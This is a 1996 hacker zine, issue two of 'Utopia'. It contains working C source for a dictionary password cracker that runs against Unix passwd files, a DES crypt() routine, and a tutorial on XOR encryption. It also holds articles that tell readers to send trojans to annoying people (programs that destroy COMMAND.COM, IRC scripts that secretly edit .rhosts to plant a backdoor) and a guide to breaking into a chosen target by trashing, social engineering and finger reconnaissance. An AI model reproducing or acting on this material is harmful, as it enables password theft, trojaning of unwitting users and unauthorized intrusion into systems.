| | ------- ___ |--\ ----- /---\ | | | / \ | | | | | | | | | | |--/ | |-----| | | | | | | | | | \___/ | \___/ | ----- | | April 1996 PUBLISHED BY: Utopium Utopia (yoo-to-pi-a), noun 1. an imaginary island described as the place of perfect moral and social conditions. 2. any place of perfection. 3. any visionary plan for a perfect system of living. Disclaimer: Everything within this publication is purely for informational purposes. By reading this you take sole responsibility for any consequences. I or any place that stores this publication take no responsibility for any actions. All information here is subject to and protected by the First Amendment of the Constitution of the United States. There is no guarantee on any information in here. If you feel that any information here may be offensive or illegal within your country then stop reading now. Part 1 . . . . . . . . . . . . . . Introduction Part 2 . . . . . . . . . . . . . . Source Code To A Simple Password Cracker Part 3 . . . . . . . . . . . . . . Hackers In Reality Part 4 . . . . . . . . . . . . . . XOR Encryption By Example Part 5 . . . . . . . . . . . . . . So You Got A Lamer On Your Back Part 6 . . . . . . . . . . . . . . Information Gathering + ------------ + | Introduction | + ------------ + By Utopium Issue two is finally here and a lot has changed since. My hard drive got screwd and I lost a bunch of files and I am a little bored since I've been reading a bunch of tech manuals and books lately. The world is pretty much the same though and I'm not much caring about the latest developments going on in computers right now. Anyway, just plain old life as usual. Right now I got myself into an interest of encryption and have been getting source code and information on the subject. I even have a small article here on XOR encryption if you are interested. I found that ripem.msu.edu has a great deal of files on encryption so feel free to check it out for yourself. One thing that I am amazed at is mathematical bugs that keep popping up in software I use. The latest one I found was in QBASIC which comes with MS-DOS and it's a simple problem with addition. Run this line of code: PRINT 3.26 + 3.25 + 2.55 And you get the result 9.059999. I find this a bit funny that the guys at Microsoft have this error in something as simple as addition. Makes you hope that they don't sell software to NASA to pilot the space shuttle. But I figure that nothing is perfect and you can never get all the bugs out of everything. At least it keeps us hackers busy. Enough with the boring talk now so read on and enjoy issue 2 of Utopia. If you want to submit any articles, information, or letters I can publish, mail me at utopium@cyberspace.org and you can find copies of Utopia at ftp.fc.net under /pub/defcon/UTOPIA if you want to look for other issues. I'd appreciate any contributions as I really don't have the time to write this whole thing so if anyone out there wants to help me keep this publication going please send in those articles. ############################################ # Source Code To A Simple Password Cracker # ############################################ In the past you have probably just been slapping those passwd files into Cracker Jack or some other password cracker and not really bothered to wonder how they work. Well for those of you who are interested, I have some simple source code you can look at here to understand how they work. I'm assuming that you have some basic understanding of the C language so you can read this without a problem. I also included a version of crypt(3) that works in every compiler I tried it in so you shouldn't have much of a problem porting this program to any platform you want. This might even run in Windows if you had a C compiler for it :). I recommend though that you get ufc-crypt though cause it's a lot faster and efficient. Tinker around though and maybe you can really build a high quality program for yourself. --BEGIN CRACK.C-- #include #include #define fetch(a,b,c,d) { fgets(a,130,b); c=strtok(a,":"); d=strtok('\0',":"); } main(){ FILE *p,*o,*w; char i[50]; char pes[130],pas[50],pps[50],pws[50]; char *es=pes,*as=pas,*ps=pps,*ws=pws; printf("Password File: "); gets(i); p=fopen(i,"r"); printf("WordList File: "); gets(i); w=fopen(i,"r"); printf("Results File : "); gets(i); o=fopen(i,"w"); fprintf(o,"*** PASS 1: NULL PASSWORDS ***\n"); while(ps){ fetch(es,p,as,ps); if(ps) if(ps[-1]==':') fprintf(o,"| User [%s] has no password!\n",as); } fflush(o); rewind(p); fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n"); do { fetch(es,p,as,ps); if(ps) if(!strcmp((char *)crypt(as,ps),ps)) fprintf(o,"| User [%s] has password [%s]\n",as,as); } while(ps); fflush(o); rewind(p); fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n"); do{ rewind(w); fetch(es,p,as,ps); do{ fgets(ws,130,w); ws[strlen(ws)-1]=0; if(!strcmp((char *)crypt(ws,ps),ps)){ fprintf(o,"| User [%s] has password [%s]\n",as,ws); fflush(o); break; } } while(!feof(w)); } while(!feof(p)); fprintf(o,"*** FINISHED SESSION ***\n"); exit(1) ; } --END CRACK.C-- --BEGIN CRYPT.C-- #include /* * asc_bin_conv() macro translates a ascii character to * a 6-bit binary number. Used to translate salts. */ #define asc_bin_conv(x) x >= 'a' ? x - 59 : (x >= 'A' ? x - 53 : x - 46 ) /* output_conv[] table is used for the reverse translation */ const char output_conv[] = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; /* * These tables are a part of the original DES specification */ /* Key permutation PC1 */ const unsigned char PC1[56] = { 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4}; /* Key schedule of left shifts LS */ const unsigned char LS[16] = { 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1}; /* Key permutation PC2 */ const unsigned char PC2[56] = { 14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2, 41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32}; /* Bit selection table E */ const unsigned char SE[48] = { 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1}; /* Permutation P */ const unsigned char P[32] = { 16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25}; /* Selection functions ('S-boxes') */ const unsigned char S[8][4][16] = { { { 14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7 }, { 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8 }, { 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0 }, { 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13 } }, { { 15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10 }, { 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5 }, { 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15 }, { 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9 } }, { { 10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8 }, { 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1 }, { 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7 }, { 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12 } }, { { 7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15 }, { 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9 }, { 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4 }, { 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14 } }, { { 2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9 }, { 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6 }, { 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14 }, { 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3 } }, { { 12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11 }, { 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8 }, { 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6 }, { 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13 } }, { { 4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1 }, { 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6 }, { 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2 }, { 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12 } }, { { 13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7 }, { 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2 }, { 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8 }, { 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11 } } }; /* Final permutation IP^-1 */ const unsigned char FP[64] = { 40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25}; /* 64-bit bitvector type */ typedef unsigned char vec64[64]; /* return buffer */ static char crypt_return[16]; /* interfaced as the UNIX crypt() */ char *crypt (char *pw, char *salt) { int i,j,s,t,cs,l,sb,p1,p2; char *ret; vec64 B,K,T,T2; unsigned char KP[16][48]; unsigned char E[48]; /* Convert pw into a bitvector */ memset (K, 0, 64); for( i = 0; (i < 64) && (*pw != '\0'); pw++ ) { K[i++] = (*pw >> 6) & 1; K[i++] = (*pw >> 5) & 1; K[i++] = (*pw >> 4) & 1; K[i++] = (*pw >> 3) & 1; K[i++] = (*pw >> 2) & 1; K[i++] = (*pw >> 1) & 1; K[i++] = *pw & 1; i++; } /* * combine PC1, LS and PC2 - tables into one for key generation * KP[i][j] is used to generate the iteration key K_i */ cs = 0; for (i = 0; i < 16; i++) { cs += LS[i]; for (j = 0; j < 48; j++) { l = PC2[j] - 1; l = (l < 28) ? (l+cs) % 28 : (l+cs) % 28 + 28; KP[i][j] = PC1[l]-1; } } /* copy salt to the beginning of the return buffer */ ret = crypt_return; *ret++ = salt[0]; *ret++ = salt[1]; /* * permutate the E table according to the saltvalue * this is the only actual change in the DES algorithm! */ s = ((asc_bin_conv(salt[1])) << 6) | (asc_bin_conv(salt[0])); memcpy(E, SE, 48); for( i = 0; i < 12; i++) if( (s >> i) & 1 != 0) { t = E[i]; E[i] = E[i+24]; E[i+24] = t; } memset (T, 0, 64); /* all zero : no need for IP */ for (cs = 0; cs < 25; cs++) /* DES is called 25 times */ for (i = 0; i < 16; i++) /* 16 DES iterations */ { /* do PC1-LS-PC2 key-shuffle and xor with the E-expanded left side */ for (j = 0; j < 48; j++) B[j] = T[E[j]+31] ^ K[KP[i][j]]; /* do sbox - substitution*/ p1 = 0; p2 = 3; for (j = 0; j < 8; j++) { sb = S[j][(B[p1] << 1) | B[p1+5]] [(B[1+p1] << 3) | (B[2+p1] << 2) | (B[3+p1] << 1) | B[4+p1]]; for (l = 0; l < 4; l++) T2[p2-l] = (sb >> l) & 1; p1 += 6; p2 += 4; } /* permutation P and xor with the right side */ for (j = 0; j < 32; j++) T[j] ^= T2[P[j]-1]; /* swap the halves (not in the last iteration!) */ if (i != 15) for (j = 0; j < 32; j++) { l = T[j]; T[j] = T[j+32]; T[j+32] = l; } } /* final permutation IP^-1 */ memcpy(T2, T, 64); for(i = 0; i < 64; i++) T[i] = T2[FP[i]-1]; /* Output conversion */ for (i = 0; i < 60; i += 6 ) *ret++ = output_conv[ T[i] << 5 | T[i+1] << 4 | T[i+2] << 3 | T[i+3] << 2 | T[i+4] << 1 | T[i+5] ]; /* the last character has only 4 bits */ *ret++ = output_conv[T[60] << 5 | T[61] << 4 | T[62] << 3 | T[63] << 2]; /* return */ *ret++ = '\0'; return crypt_return; } --END CRYPT.C-- (*)(*)(*)(*)(*)(*)(*)(*) (*)Hackers in Reality(*) (*)(*)(*)(*)(*)(*)(*)(*) [By Utopium] The Mentor probably gave one of the best descriptions of hackers when he wrote the Hacker Manifesto, unfortunately some people are not taking it seriously and there is a lot of confusion and craziness about hackers today. I thought I would write something about this because I am sick of all the stupid things being said about hackers and want some people to understand. Any of you out there that don't know anything about hackers and are somehow reading this, my guess is that you see us as criminals who transfer money from banks and steal top secret information from military sites. Sorry to say but we are not criminal like that. Those things are what spies and bank robbers do. If you hear something on the news about a hacker doing these things or some other malicious acts, thats just the media and law enforcement officials making the image. For those who are not technically smart, or lamers, I just want you to stop calling yourselves hackers because you are making things worse. Many of you roam around America Online and use AOHell and programs like it and claiming that you are elite because you talk cool and run lots of macros. You fill newsgroups with bogus and often pathetic comments and information. You even now get search engines like Yahoo! to have your own section where people think you are real hackers because you have lots of graphics and anarchy files. Lamers like you are what cause the rest of the world to think that we are immature, evil, and even criminal. You all need to stop what your doing and become real hackers if you want to call yourself one. What the hell do I define a hacker as? Overall I think of a hacker as someone who wants to learn how computers and networks operate. We use our skills in accessing systems to further our knowledge and understanding. We don't mean any real harm to anyone and even would like to help others with our knowledge. Hacking is a lifestyle which you are only judged by your mind and not what type of person you are and where you are from. Honestly I know some things may sound pretty stupid in this article but I just have to get this out because the world today is making me sick on how they view and treat hackers. Writing this won't change the world but hopefully it will influence a few people on what reality is. * * * * * * * * * * * * * * * * XOR Encryption By Example * * * * * * * * * * * * * * * * * By: Utopium * * * * * * * * * For those of you who are still somewhat new to computers you probably have never heard of XOR. The Exclusive OR system was first used in assembly language for bit manipulation but has now been made to work in many programming languages. What XOR does is compare to numbers in binary form and returns a new number based on the results of the first two numbers. Any bits in the same position with the same value are set to 0 while any that have different values are set to 1. Here's an example of how it works: 00000101 (5) XOR 00000110 (6) = 00000011 (3) You can see this is pretty simple and can be done on paper if you wanted to do it that way. XORing 5 with 6 brings the result of 3 since the third bit of each both have the same value while the first and second have unequal values. I could go into more detail about bit manipulation but that should be left for when you want to get deeper into programming. You should see how encryption works into this by now. By comparing one number to a certain key value you can obscure it by this until you run this again to decrypt the data. There is no need to make separate encryption and decryption functions as XORing using the same key value on the encrypted data will return it to it's original form. You can try this yourself by taking the example and XORing 3 by 6 to find that the result will be 5. This can make things pretty convenient. Now to be honest with you, this encryption is very insecure and anyone can make a simple program that will break it in minutes so you don't want to use this to encrypt confidential or personal information. So why would you use this? Well when you encrypt certain data within a program like a cheat code in a game or a password it makes it a lot tougher to crack since you can't just simply crack a whole executable file. Lots of shareware authors use this for the registration codes they have and virus writers can evade virus scanners better by encrypting certain instruction code. Using this you can make sure no one can easily see data you don't want them to see in your programs. I made a little program in BASIC which does simple encryption on a text file by taking a password and modifying the number value of it to something that can be used in this simple program. Here's the source: LINE INPUT "Input File: ", inf$ LINE INPUT "Output File: ", outf$ LINE INPUT "Password: ", passwd$ OPEN inf$ FOR INPUT AS #1 OPEN outf$ FOR OUTPUT AS #2 FOR n = 1 TO LEN(passwd$) pn = pn + ASC(MID$(passwd$, n, 1)) NEXT n WHILE pn > 255 pn = INT(pn / 2) WEND WHILE NOT EOF(1) bscd$ = INPUT$(1, 1) PRINT #2, CHR$(ASC(bscd$) XOR pn); WEND CLOSE As you can see this is pretty simple and small so it shouldn't be hard to implement into whatever you want. This uses an 8-bit key but if you want something a little more secure you can have a 16 or 32-bit key and encrypt data in blocks of the same size as the key. Encrypting multiple times using different keys each time can also bring a little more security if needed. Using this method of encryption on your programs can be very helpful for any situation. This is just a small example of encryption which you can make probably as powerful as the DES or IDEA methods. Experiment with this a little and you should be able to add that little feature you just needed on your programs. ================================= So You Got A Lamer On Your Back ================================= Don't you just hate it when you have some idiot on your back who keeps bothering you? You just get real annoyed and start flaming him and he flames you back for stupid reasons and he seems to just make you want to go nuts. Well don't get too angry, because there are better ways to rid of the pest. For those really annoying lamers who go "Can someone send me a program to change my grades?" or "Send me k-rad warez so I can hack the Pentagon and be 31337!" you should stop and think for a minute. If you want them to leave you alone, give them what they want. Obviously there are no such programs to do these things, all you really got to do is make it look like it does something while it really just screws them over. Something that kills their COMMAND.COM or something else should cut them off for a while as they complain to someone else or try and actually learn how to use a computer. Once you slapped this together just send it off with a little friendly note on how to use the program and you shouldn't have to worry about them. Lamers on IRC can be the worst as they may have some bots that go crazy and think they are powerful because their nick has alternating upper and lower case letters. Some seem to actually know enough to be on a shell account and use a simple IRC client, but they don't know much more than that. If they were to ask you for a bot or some other script they could use, be nice and DCC one over. Make sure that you have a ready made script which when they run, will modify their .rhosts file to instantly let you in their shell. Now you can have fun doing whatever you feel in their shell. One thing strange is that lamers like to collect information which can actually be of some use. You may be in need of this but they say that they need something big in exchange. Just as before, give them what they want. Act pleasant and give them bogus data saying is information on military sites. A number of people can be fooled by the simple output of a netstat or some other information service. If it's enough beyond their understanding they will probably fall for it and send that info you needed. You don't need to talk harshly or annoy a lamer back in order to be rid of their presence, a kinder approach can be the best. Using this guise can help greatly in taking care of your problems. Just have a little imagination and you should come up with a number of ideas to keep a peaceful hacker life. /-----------------------\ | INFORMATION GATHERING | \-----------------------/ \ BY: UTOPIUM / \_____________/ You know I get real annoyed when I see a post by someone asking to get a program to hack any computer they want or want someone to teach them to hack within a few hours. If your one of those people you better read this or one of the things in the previous article may happen to you. When you want to hack a system, you first need to find out your dealing with. Say it's some internet provider which gets on your nerves or a company which has some things in their drives that interest you. Whatever it is you must be able to understand the system in order to use it. If the place is nearby you'll want to go there and scout around. Hang around the building and see what you can see at desks or other places. Trashing is something that will help out a lot. Finding documents on certain ways of accessing their network and info on what kind of operating system is run are the most crucial thing. Also find information about what they do and anything like that. If you want to get even more information, do a little social engineering from phone numbers you found trashing and also do mail requests for information if they make it freely available. Once you have all this, you'll want to do some information searching on the computer to learn more about the actual software and protocols. The WHOIS service can easily give some data like other sites, names, and e-mail addresses of superusers. Use finger extensively by first doing something like finger @host.com and then fingering root, sysadm, and any other users you know of as to obtain information of what a password could possibly or a phone number a user may place in their .plan file which can be used for social engineering. Since the web is also expanding to include almost anything imaginable, check out the sites web pages and learn more about how they are organized and such. Now that you have gathered data on the types of operating systems and networks, a little research is in order. If you don't know about the systems they use find any documentation you can get your hands on. But if you already know a good deal, it's still a good idea to brush up as to not make any mistakes. With all this knowledge in your head, it's time to break in. There are various methods for this such as simply guessing passwords or using a bug in a certain service they have like sendmail. After successfully breaching their security in this method, you can freely explore and hack your way into higher levels of access. All you need to know when doing all of this is that you need to obtain as much information as you can on your goal. With a little dedication and creativity, you should be ale to breach almost any system of your choosing. What I described here is only an example of the many ways to successfully hack a computer system.